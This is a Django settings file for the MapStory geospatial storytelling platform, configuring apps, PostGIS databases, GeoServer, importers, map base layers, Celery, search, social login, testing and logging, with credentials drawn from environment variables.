geonode.settings import *\nimport pyproj\n\n#\n# General Django development settings\n#\n\nSITENAME = 'MapStory'\nSITEURL = \"%s://%s\" % (os.environ['PUBLIC_PROTOCOL'], os.environ['PUBLIC_HOST'])\n\n# Defines the directory that contains the settings file as the LOCAL_ROOT\n# It is used for relative settings elsewhere.\nLOCAL_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n\nWSGI_APPLICATION = \"mapstory.wsgi.application\"\n\nSTATICFILES_DIRS = [\n os.path.join(LOCAL_ROOT, \"static\"),\n ] + STATICFILES_DIRS\n\nMEDIA_ROOT = os.environ['MEDIA_ROOT']\nSTATIC_ROOT = os.environ['STATIC_ROOT']\n\n\n# Location of url mappings\nROOT_URLCONF = 'mapstory.urls'\n\n# Location of locale files\nLOCALE_PATHS = (\n os.path.join(LOCAL_ROOT, 'locale'),\n ) + LOCALE_PATHS\n\n#\n# Application Settings\n#\n# This removes actstream in order to add it at the end of installed apps.\n# This is recommended by the actstream docs:\n# http://django-activity-stream.readthedocs.io/en/latest/installation.html#basic-app-configuration\ninstalled_apps_list = list(INSTALLED_APPS)\ninstalled_apps_list.remove('actstream')\nINSTALLED_APPS = tuple(installed_apps_list)\nINSTALLED_APPS += (\n 'django_nose',\n 'mapstory',\n 'django.contrib.webdesign',\n 'geonode',\n 'geonode.contrib.geogig',\n 'icon_commons',\n 'maploom',\n 'haystack',\n 'mailer',\n 'django_slack',\n 'fluent_comments',\n 'crispy_forms',\n 'threadedcomments',\n 'django_comments',\n 'osgeo_importer',\n 'solo',\n 'coverage',\n 'notification',\n 'mapstory.apps.health_check_geoserver',\n 'mapstory.apps.thumbnails',\n 'mapstory.storypins',\n 'mapstory.apps.journal',\n 'mapstory.apps.favorite',\n 'mapstory.apps.teams',\n 'mapstory.apps.organizations',\n 'mapstory.apps.initiatives',\n 'mapstory.mapstory_profile',\n 'mapstory.mapstories',\n 'health_check',\n 'health_check.db',\n 'health_check.cache',\n 'health_check.storage',\n 'health_check.contrib.celery',\n 'health_check.contrib.s3boto_storage',\n)\n# DO NOT REMOVE (read commment above)\nINSTALLED_APPS += (\n 'mapstory.apps.activities',\n 'actstream',\n)\n# Thanks !\n\nMAPSTORY_APPS = (\n\n 'mapstory.apps.storyframes',\n 'mapstory.apps.flag', # - temporarily using this instead of the flag app for django because they need to use AUTH_USER_MODEL\n\n)\n\nINSTALLED_APPS += MAPSTORY_APPS\n\n#\n# Template Settings\n#\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(LOCAL_ROOT, 'templates'),\n os.path.join(os.path.dirname(geonode.__file__), 'templates'),\n os.path.join('deps/story-tools-composer', 'partials'),\n os.path.join(LOCAL_ROOT, 'apps/initiatives'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.tz',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'account.context_processors.account',\n 'geonode.context_processors.resource_urls',\n 'geonode.geoserver.context_processors.geoserver_urls',\n 'mapstory.context_processors.context',\n 'user_messages.context_processors.user_messages'\n ],\n },\n },\n]\n\n#\n# Database Settings\n#\nDATABASE_HOST = os.environ['DATABASE_HOST']\nDATABASE_PASSWORD = os.environ['DATABASE_PASSWORD']\nDATABASE_PORT = '5432'\n\nif DATABASE_PASSWORD:\n DATABASES = {\n 'default': {\n # we use transaction_hooks so we can attach on_commit actions\n 'ENGINE': 'transaction_hooks.backends.postgresql_psycopg2',\n 'NAME': 'mapstory',\n 'USER': 'mapstory',\n 'PASSWORD': DATABASE_PASSWORD,\n 'HOST': DATABASE_HOST,\n 'PORT': '5432',\n },\n 'datastore': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n 'NAME': 'mapstory_data',\n 'USER': 'mapstory',\n 'PASSWORD': DATABASE_PASSWORD,\n 'HOST': DATABASE_HOST,\n 'PORT': '5432',\n },\n 'geogig': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'mapstory_geogig',\n 'USER': 'mapstory',\n 'PASSWORD': DATABASE_PASSWORD,\n 'HOST': DATABASE_HOST,\n 'PORT': '5432',\n }\n }\n\n UPLOADER = {\n 'BACKEND': 'geonode.importer',\n 'OPTIONS': {\n 'TIME_ENABLED': True,\n 'GEOGIG_ENABLED': True,\n }\n }\n\n USE_BIG_DATE = True\n\n GEOGIG_DATASTORE_NAME = 'geogig'\n\n#\n# Geoserver Settings\n#\nGEOSERVER_LOCATION = \"%s://%s:%d/geoserver/\" % (os.environ['PRIVATE_PROTOCOL'], os.environ['GEOSERVER_HOST_INTERNAL'], int(os.environ['GEOSERVER_PORT_INTERNAL']))\nGEOSERVER_PUBLIC_LOCATION = \"%s://%s/geoserver/\" % (os.environ['PUBLIC_PROTOCOL'], os.environ['PUBLIC_HOST'])\n\nOGC_SERVER = {\n 'default': {\n 'BACKEND': 'geonode.geoserver',\n 'LOCATION': GEOSERVER_LOCATION,\n 'LOGIN_ENDPOINT': 'j_spring_oauth2_geonode_login',\n 'LOGOUT_ENDPOINT': 'j_spring_oauth2_geonode_logout',\n # PUBLIC_LOCATION needs to be kept like this because in dev mode\n # the proxy won't work and the integration tests will fail\n # the entire block has to be overridden in the local_settings\n 'PUBLIC_LOCATION': GEOSERVER_PUBLIC_LOCATION,\n 'USER': 'admin',\n 'PASSWORD': os.environ['GEOSERVER_PASSWORD'],\n 'MAPFISH_PRINT_ENABLED': True,\n 'PRINT_NG_ENABLED': True,\n 'GEONODE_SECURITY_ENABLED': True,\n 'GEOGIG_ENABLED': True,\n 'WMST_ENABLED': False,\n 'BACKEND_WRITE_ENABLED': True,\n 'WPS_ENABLED': True,\n 'LOG_FILE': '%s/geoserver/data/logs/geoserver.log'\n % os.path.abspath(os.path.join(PROJECT_ROOT, os.pardir)),\n # Set to name of database in DATABASES dictionary to enable\n 'DATASTORE': 'geogig',\n 'TIMEOUT': 10, # number of seconds to allow for HTTP requests,\n 'GEOGIG_DATASTORE_DIR': '/var/lib/geoserver/data/geogig',\n 'PG_GEOGIG': True\n }\n}\n\n\ndef str_to_bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n\n#\n# Email Settings\n#\nACCOUNT_ACTIVATION_DAYS = int(os.environ.get('ACCOUNT_ACTIVATION_DAYS', '0'))\nACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = '/'\nACCOUNT_EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL = '/'\nACCOUNT_EMAIL_CONFIRMATION_EMAIL = True\nACCOUNT_EMAIL_CONFIRMATION_REQUIRED = str_to_bool(os.environ['ACCOUNT_EMAIL_CONFIRMATION_REQUIRED'])\nACCOUNT_LOGIN_REDIRECT_URL = '/'\nACCOUNT_OPEN_SIGNUP = True\nDEFAULT_FROM_EMAIL = os.environ.get('DEFAULT_FROM_EMAIL', '')\nEMAIL_BACKEND = os.environ.get('EMAIL_BACKEND', 'django.core.mail.backends.console.EmailBackend')\nEMAIL_HOST = os.environ.get('EMAIL_HOST', '')\nEMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD', '')\nEMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER', '')\nEMAIL_PORT = int(os.environ.get('EMAIL_PORT', '25'))\nEMAIL_USE_TLS = str_to_bool(os.environ.get('EMAIL_USE_TLS', 'false'))\nTHEME_ACCOUNT_CONTACT_EMAIL = os.environ.get('EMAIL_HOST_USER', '')\n\n#\n# AWS S3 Settings\n#\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID','')\nAWS_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME' ,'')\nAWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME','')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY','')\nAWS_S3_BUCKET_DOMAIN = '%s.s3.amazonaws.com' % (AWS_STORAGE_BUCKET_NAME,)\nUSE_AWS_S3_STATIC = False\nUSE_AWS_S3_MEDIA = False\n\nif USE_AWS_S3_STATIC:\n STATICFILES_LOCATION = 'static'\n STATICFILES_STORAGE = 'mapstory.s3_storages.StaticStorage'\n STATIC_URL = \"https://%s/%s/\" % (AWS_S3_BUCKET_DOMAIN, STATICFILES_LOCATION)\n REMOTE_CONTENT_URL = STATIC_URL + 'assets'\n\nif USE_AWS_S3_MEDIA:\n MEDIAFILES_LOCATION = 'media'\n MEDIA_URL = \"https://%s/%s/\" % (AWS_S3_BUCKET_DOMAIN, MEDIAFILES_LOCATION)\n DEFAULT_FILE_STORAGE = 'mapstory.s3_storages.MediaStorage'\n\n#\n# Django OSGEO Importer Settings\n#\nIMPORT_HANDLERS = (\n 'mapstory.import_handlers.TruncatedNameHandler',\n 'osgeo_importer.handlers.BigDateFieldConverterHandler',\n 'osgeo_importer.handlers.geoserver.GeoserverPublishHandler',\n 'osgeo_importer.handlers.geoserver.GeoServerBoundsHandler',\n 'osgeo_importer.handlers.geoserver.GeoServerTimeHandler',\n 'osgeo_importer.handlers.geoserver.GeoWebCacheHandler',\n 'osgeo_importer.handlers.geonode.GeoNodePublishHandler',\n 'mapstory.import_handlers.LayerAppendHandler'\n)\n\nOSGEO_IMPORTER_GEONODE_ENABLED = True\nOSGEO_DATASTORE = 'datastore'\n# Soft time limit for the import_object celery task of django_osgeo_importer, should be changed later after testing.\nIMPORT_TASK_SOFT_TIME_LIMIT = 1800\nPROJECTION_DIRECTORY = os.path.join(os.path.dirname(pyproj.__file__), 'data/')\n\nDEFAULT_IMPORTER_CONFIG = {\n 'configureTime': True,\n 'editable': True,\n 'convert_to_date': [],\n 'always_geogig': True,\n 'index': 0,\n 'permissions': {'users':{'AnonymousUser':['change_layer_data', 'download_resourcebase', 'view_resourcebase']}, 'groups':{'registered':['change_layer_style']}}\n}\n\n# Append only needs to import to temporarily store changes, so we turn off editable and the geogig history.\nDEFAULT_APPEND_CONFIG = {\n 'configureTime': True,\n 'editable': False,\n 'convert_to_date': [],\n 'always_geogig': False,\n 'index': 0\n}\n\n# the layer_create view allows users to create layer by providing a workspace and a featureType\n# this settings whitelists the datastores in which layers creation are allowed\nALLOWED_DATASTORE_LAYER_CREATE = ('*',)\n\n# @todo remove this hack once maploom can deal with other config\n# have to put this after local_settings or any adjustments to OGC_SERVER will\n# not get picked up\nMAP_BASELAYERS = [\n {\n \"source\": {\n \"ptype\": \"gxp_wmscsource\",\n # Setting lazy=True will prevent MapLoom from making a getCapabilities request until\n # the user tries to add a layer.\n # See https://github.com/ROGUE-JCTD/MapLoom/commit/d7ea83d17b4e17150f02a0c9e94a79c3592297c2.\n \"lazy\": True,\n \"url\": OGC_SERVER['default']['PUBLIC_LOCATION'] + \"wms\",\n \"restUrl\": \"/gs/rest\",\n \"name\": \"local geoserver\"\n }\n },\n {\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer\",\n \"args\": [\"No background\"],\n \"visibility\": False,\n \"fixed\": True,\n \"group\": \"background\"\n },\n {\n \"source\": {\"ptype\": \"gxp_osmsource\"},\n \"type\": \"OpenLayers.Layer.OSM\",\n \"args\": [\"OpenStreetMap\"],\n \"name\": 'mapnik',\n 'title': 'OpenStreetMap',\n \"visibility\": False,\n \"fixed\": True,\n \"group\": \"background\"\n },\n {\n \"source\": {\"ptype\": \"gxp_osmsource\"},\n \"type\": \"OpenLayers.Layer.OSM\",\n \"args\": [\"Humanitarian OpenStreetMap\", [\n \"//a.tile.openstreetmap.fr/hot/${z}/${x}/${y}.png\",\n \"//b.tile.openstreetmap.fr/hot/${z}/${x}/${y}.png\",\n \"//c.tile.openstreetmap.fr/hot/${z}/${x}/${y}.png\"\n ], {\"tileOptions\": {\"crossOriginKeyword\": None}}\n ],\n 'title': 'Humanitarian OpenStreetMap',\n 'name': \"hot\",\n \"visibility\": False,\n \"fixed\": True,\n \"group\": \"background\"\n },\n {\n \"source\": {\"ptype\": \"gxp_olsource\"},\n \"type\": \"OpenLayers.Layer.WMS\",\n \"group\": \"background\",\n \"visibility\": False,\n \"fixed\": True,\n \"args\": [\n \"Naked Earth\",\n \"//maps.opengeo.org/geowebcache/service/wms\",\n {\n \"layers\": [\"Wayne\"],\n \"format\": \"image/png\",\n \"tiled\": True,\n \"tilesOrigin\": [-20037508.34, -20037508.34]\n },\n {\"buffer\": 0}\n ]\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'natural-earth-1',\n 'title': 'Natural Earth',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'natural-earth-2',\n 'title': 'Natural Earth 2',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'geography-class',\n 'title': 'Geography Class',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'control-room',\n 'title': 'MapBoxControlRoom',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'visibility': False,\n 'name': 'world-dark',\n 'title': 'World Dark',\n 'group': 'background'\n },\n {\n 'source': {\n 'ptype': 'gxp_mapboxsource',\n 'hidden': True\n },\n 'name': 'world-light',\n 'title': 'World Light',\n 'group': 'background'\n }\n]\n\n#\n# Avatar Settings\n#\nAVATAR_DEFAULT_URL = \"%s/static/mapstory/img/default_avatar_lg.png\" % SITEURL\nAVATAR_GRAVATAR_BACKUP = False\nAVATAR_GRAVATAR_SSL = True\nAUTO_GENERATE_AVATAR_SIZES = (35, 45, 75, 100)\n\n#\n# Celery Settings\n#\nBROKER_URL = \"amqp://mapstory:%s@%s/%s\" % (os.environ['RABBITMQ_APPLICATION_PASSWORD'], os.environ['RABBITMQ_HOST'], os.environ['RABBITMQ_APPLICATION_VHOST'])\nCELERY_ALWAYS_EAGER = str_to_bool(os.environ.get('CELERY_ALWAYS_EAGER', 'False')) # False makes tasks run asynchronously\nCELERY_DEFAULT_QUEUE = \"default\"\nCELERY_DEFAULT_EXCHANGE = \"default\"\nCELERY_DEFAULT_EXCHANGE_TYPE = \"direct\"\nCELERY_DEFAULT_ROUTING_KEY = \"default\"\nCELERY_CREATE_MISSING_QUEUES = True\nCELERY_EAGER_PROPAGATES_EXCEPTIONS = str_to_bool(os.environ.get('CELERY_EAGER_PROPAGATES_EXCEPTIONS', 'False'))\nCELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'\nCELERY_IGNORE_RESULT = False\n\n#\n# Haystack Settings\n#\nHAYSTACK_SEARCH = True\n# Update facet counts from Haystack\nHAYSTACK_FACET_COUNTS = False\nHAYSTACK_URL = \"%s://%s:%d\" % (os.environ['PRIVATE_PROTOCOL'], os.environ['ELASTIC_HOST'], int(os.environ['ELASTIC_PORT']))\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'mapstory.search.elasticsearch_backend.MapStoryElasticsearchSearchEngine',\n 'URL': HAYSTACK_URL,\n 'INDEX_NAME': 'geonode',\n 'EXCLUDED_INDEXES': ['geonode.layers.search_indexes.LayerIndex'],\n },\n}\nSKIP_PERMS_FILTER = True\nHAYSTACK_SIGNAL_PROCESSOR = 'mapstory.search.signals.RealtimeSignalProcessor'\n\n#\n# Social Authentication Settings\n#\nENABLE_SOCIAL_LOGIN = str_to_bool(os.environ['ENABLE_SOCIAL_LOGIN'])\nif ENABLE_SOCIAL_LOGIN:\n SOCIAL_AUTH_NEW_USER_REDIRECT_URL = '/'\n\n INSTALLED_APPS += (\n 'social.apps.django_app.default',\n 'provider',\n 'provider.oauth2',\n )\n\n AUTHENTICATION_BACKENDS = (\n 'social.backends.google.GoogleOAuth2',\n 'social.backends.facebook.FacebookOAuth2',\n )\n\nDEFAULT_AUTH_PIPELINE = (\n 'social.pipeline.social_auth.social_details',\n 'social.pipeline.social_auth.social_uid',\n 'social.pipeline.social_auth.auth_allowed',\n 'social.pipeline.social_auth.social_user',\n 'social.pipeline.user.get_username',\n 'social.pipeline.mail.mail_validation',\n 'social.pipeline.social_auth.associate_by_email',\n 'social.pipeline.user.create_user',\n 'social.pipeline.social_auth.associate_user',\n 'social.pipeline.social_auth.load_extra_data',\n 'social.pipeline.user.user_details'\n)\n\nSOCIAL_AUTH_FACEBOOK_KEY = os.environ.get('FACEBOOK_APP_ID','')\nSOCIAL_AUTH_FACEBOOK_SECRET = os.environ.get('FACEBOOK_APP_SECRET','')\nSOCIAL_AUTH_FACEBOOK_SCOPE = ['email']\nSOCIAL_AUTH_FACEBOOK_PROFILE_EXTRA_PARAMS = {\n 'fields': 'id,name,email',\n}\n\nSOCIAL_AUTH_GOOGLE_OAUTH2_KEY = os.environ.get('GOOGLE_OATH2_CLIENT_ID','')\nSOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = os.environ.get('GOOGLE_OATH2_CLIENT_SECRET','')\n\nGEOFENCE_SECURITY_ENABLED = False\n\n#\n# Activity Stream Settings\n#\nSITE_ID = 1\nACTSTREAM_SETTINGS = {\n 'FETCH_RELATIONS': True,\n 'USE_PREFETCH': False,\n 'USE_JSONFIELD': True,\n 'GFK_FETCH_DEPTH': 1,\n}\n#\n# Threaded Comment Settings\n#\nFLUENT_COMMENTS_EXCLUDE_FIELDS = ('name', 'email', 'url', 'title')\nCOMMENTS_APP = 'fluent_comments'\n\n#\n# Automated Testing Settings\n#\nclass DisableMigrations(object):\n def __contains__(self, item):\n return True\n\n def __getitem__(self, item):\n return \"notmigrations\"\n\n\n# Disable migrations only on tests\nTESTS_IN_PROGRESS = False\nif 'test' in sys.argv[1:] or 'jenkins' in sys.argv[1:]:\n logging.disable(logging.CRITICAL)\n PASSWORD_HASHERS = (\n 'django.contrib.auth.hashers.MD5PasswordHasher',\n )\n DEBUG = False\n TEMPLATE_DEBUG = False\n TESTS_IN_PROGRESS = True\n MIGRATION_MODULES = DisableMigrations()\n\n# Setup django-nose as our test runner and have it provide us with HTML coverage reports generated in the cover folder.\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n# TESTS NEED TO BE RUN WITH ./test.sh for coverage to work!!!\n# https://stackoverflow.com/questions/24668174/how-to-test-coverage-properly-with-django-nose\n# Nose Test arguments. Will not find and run tests unless --exe is specified.\n# Nose-runner has issues with coverage reporting and model loading.\n# https://github.com/django-nose/django-nose/issues/180\n# Coverage options are now specified in `.coveragerc`\nNOSE_ARGS = [\n '--exe',\n # This:\n '--ignore-files=(^\\.|^_|pavement\\.py$|fabfile\\.py$|local_settings\\.py$|cf\\.py$|search_indexes\\.py$)',\n # Is not the same as this:\n # '--exclude=(^\\.|^_|pavement\\.py$|fabfile\\.py$|_settings\\.py$|cf\\.py$|search_indexes\\.py$)',\n '--all-modules',\n '--traverse-namespace',\n # FOR DEBUGGING:\n # '--detailed-errors',\n # '--with-id',\n # '--pdb',\n # '--verbosity=3',\n # '--stop',\n]\n\n#\n# Debug Settings\n#\nDEBUG_STATIC = True\nDEBUG = str_to_bool(os.environ.get('DEBUG', 'False'))\nif not DEBUG:\n ALLOWED_HOSTS = os.environ.get('ALLOWED_HOSTS', '').split('|')\nSESSION_COOKIE_DOMAIN = None\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(message)s',\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'null': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.NullHandler',\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n 'mail_admins': {\n 'level': 'ERROR', 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler',\n },\n 'slack_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django_slack.log.SlackExceptionHandler'\n }\n },\n \"loggers\": {\n \"django\": {\n \"handlers\": [\"console\", \"slack_admins\"], \"level\": \"ERROR\", },\n \"mapstory\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"gsconfig.catalog\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"owslib\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"pycsw\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"elasticsearch\": {\n \"handlers\": [\"console\"], \"level\": \"ERROR\", },\n \"osgeo_importer\": {\n \"handlers\": [\"console\"], \"level\": \"DEBUG\", },\n },\n}\n\n#\n# Slack Settings\n#\nSLACK_BACKEND = os.environ.get('SLACK_BACKEND', 'django_slack.backends.RequestsBackend')\nSLACK_TOKEN = os.environ.get('SLACK_TOKEN', '')\nSLACK_CHANNEL = os.environ.get('SLACK_CHANNEL', '')\nSLACK_ICON_EMOJI = os.environ.get('SLACK_ICON_EMOJI', '')\nSLACK_USERNAME = os.environ.get('SLACK_USERNAME', '')\n\n#\n# Misc Settings\n#\nREGISTRATION_OPEN = True\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nAUTOCOMPLETE_QUICK_SEARCH = False\nTHEME = os.environ.get('THEME', 'default')\nUSER_SNAP = True\nGOOGLE_ANALYTICS = os.environ.get('GOOGLE_ANALYTICS', '')\nLOCAL_CONTENT = False\n\n# Override number of results per page listed in the GeoNode search pages\nCLIENT_RESULTS_LIMIT = 30\n\n# Download formats available in layer detail download modal\nDOWNLOAD_FORMATS_VECTOR = [\n 'Zipped Shapefile', 'GML 2.0', 'GML 3.1.1', 'CSV', 'GeoJSON', 'KML',\n]\n\nMESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'\n\nSCHEMA_DOWNLOAD_EXCLUDE = [\n 'FID',\n 'ogc_fid',\n 'date_xd',\n 'date_parsed',\n]\n\n#\n# Feature toggles\n#\nFEATURE_MULTIPLE_STORY_CHAPTERS = str_to_bool(os.environ.get('FEATURE_MULTIPLE_STORY_CHAPTERS', 'False'))\n\n# Choose thumbnail generator -- this is the delayed phantomjs generator\nTHUMBNAIL_GENERATOR = \"mapstory.apps.thumbnails.tasks.create_gs_thumbnail_mapstory_tx_aware\"\n", "repo_name": "ngageoint/storyscapes", "sub_path": "mapstory/settings/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 21735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 107, "usage_type": "call"}, {"api_name": "geonode.__file__", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 183, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 184, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "os.pardir", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 223, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 223, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 227, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 230, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 230, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 231, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 231, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 232, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 232, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 233, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 233, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 234, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 234, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 235, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 235, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 236, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 236, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 237, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 237, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 242, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 243, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 243, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 244, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 244, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 245, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 279, "usage_type": "call"}, {"api_name": "pyproj.__file__", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 442, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 443, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 443, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 449, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 449, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 459, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 474, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 503, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 503, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 504, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 504, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 510, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 510, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 511, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 511, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 544, "usage_type": "attribute"}, {"api_name": "logging.disable", "line_number": 545, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 545, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 582, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 582, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 584, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 584, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 644, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 644, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 645, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 645, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 646, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 646, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 647, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 647, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 648, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 648, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 656, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 656, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 658, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 658, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 681, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 681, "usage_type": "attribute"}]} +{"seq_id": "73453534564", "text": "from django.db import models\nfrom django_mysql.models import JSONField\nfrom kratos.apps.pipeline.models import Pipeline\nfrom kratos.apps.tasktpl.models import Tasktpl\n\n\nclass 